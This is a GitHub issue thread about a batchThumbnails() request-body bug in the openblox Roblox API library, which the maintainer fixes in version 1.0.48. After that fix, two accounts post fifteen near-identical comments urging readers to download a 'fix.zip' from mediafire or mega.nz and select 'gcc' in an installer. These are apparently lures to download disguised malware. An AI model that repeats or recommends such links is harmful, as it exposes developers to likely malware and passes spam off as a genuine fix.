### ISSUE TITLE
`ClassicThumbnailsApi.batchThumbnails()` request body may be incorrect

### ISSUE THREAD

**Issue by LuckFire** [MightyPart/openblox#9]
This is my own code, which I use to batch-get icons for experiences. Just simple mapping with an array of experience ids provided.
```ts
async function batchGetExperienceThumbnails(ids: number[]) {
    const { data: thumbnails } = await batchThumbnails({
        requests: ids.map((id) => ({
            type: "GameIcon",
            targetId: id,
            size: "512x512",
            format: "Png",
            isCircular: false
        }))
    });

    return thumbnails;
}
```
However, it throws a 400 error with this as the Roblox provided error.
```json
{
  "errors": [{
    "code": 4,
    "message": "The requested Ids are invalid, of an invalid type or missing.",
    "userFacingMessage": "Something went wrong"
  }]
}
```

Even when using an example request from the documentation, it still throws the same error.
```js
const { data: thumbnails } = await batchThumbnails({ requests: [
    {
      type: "AvatarHeadShot",
      targetId: 45348281,
      size: "720x720",
      format: "Png",
      isCircular: false
    }
]});
```

**Comment by cameronpcampbell** [comment]
I can reproduce this. This issue is incredibly odd as it used to work fine, and the example request from the openblox docs still works fine on roblox's swagger docs: https://thumbnails.roblox.com/docs/index.html.

**Comment by cameronpcampbell** [comment]
Just figured out the error. There was an edge case where Array's were not being stringified in http requests. 😅 

This has now been fixed in `1.0.48` - Apologies for the inconvenience.

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
